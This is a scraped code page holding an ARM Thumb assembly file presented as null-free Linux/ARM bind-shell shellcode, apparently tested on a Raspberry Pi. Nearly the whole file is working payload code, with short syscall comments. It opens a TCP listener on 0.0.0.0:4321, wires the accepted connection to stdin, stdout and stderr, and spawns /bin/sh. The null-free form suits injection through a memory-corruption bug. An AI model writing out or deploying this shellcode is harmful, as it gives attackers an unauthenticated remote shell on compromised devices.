66 lines
No EOL
1.2 KiB
ArmAsm
66 lines
No EOL
1.2 KiB
ArmAsm
/*
|
|
* Title: Linux/ARM - Bind_Shell Shellcode TCP (/bin/sh). Null free shellcode 0.0.0.0:4321 (84 bytes)
|
|
*Author: Gokul Babu-https://www.linkedin.com/in/gokul-babu-452b3b112/
|
|
* Tested: armv7l (Raspberry Pi b3+)
|
|
* Date: 2019-01-28
|
|
*/
|
|
|
|
/*socket-281, domain=2,type=1,protocol=0*/
|
|
/*bind-282 sockfd=final result of socket,&addr=struct,adrlen=16*/
|
|
/*listen-284,sockfd=id value-r4,backlog=1/2*/
|
|
/*accept-285,sockfd=id,&addr=0,addrlen=0*/
|
|
/*dup2-63,sockfd=final result of accept r4<-r0=4,newfd=0,1,2*/
|
|
/*execve-11,execv="/bin/sh",0,0*/
|
|
|
|
.section .text
|
|
.global _start
|
|
_start:
|
|
.ARM
|
|
add r3,pc,#1
|
|
bx r3
|
|
.THUMB
|
|
//socket:
|
|
mov r0,#2
|
|
mov r1,#1
|
|
mov r7,#200
|
|
add r7,#81
|
|
svc #1
|
|
mov r4,r0
|
|
push {r0,r1,r2} /*r0=3,r1=1,r2=0*/
|
|
//bind:
|
|
adr r1,struct
|
|
strb r2,[r1,#1]
|
|
str r2,[r1,#4] /*store r2=0 in IP*/
|
|
mov r2,#16
|
|
add r7,#1
|
|
svc #1
|
|
//listen:
|
|
pop {r0,r1,r2} /*r0=3,r1=1,r2=0*/
|
|
add r7,#2
|
|
svc #1
|
|
//accept:
|
|
mov r0,r4
|
|
sub r1,r1
|
|
add r7,#1
|
|
svc #1
|
|
add r0,r0,r2 /*r0=4,r2=0*/
|
|
//dup2:
|
|
//dup(4,2)
|
|
mov r7,#63
|
|
//dup(4,1)
|
|
mov r1,#1
|
|
svc #1
|
|
//dup(4,0)
|
|
sub r1,#1
|
|
svc #1
|
|
//execve:
|
|
adr r0,exc
|
|
strb r2,[r0,#7]
|
|
mov r7,#11
|
|
svc #1
|
|
exc:
|
|
.ascii "/bin/shX"
|
|
struct:
|
|
.ascii "\x02\xff"
|
|
.ascii "\x10\xE1" //port 4321
|
|
.byte 1,1,1,1 //IP-0.0.0.0 |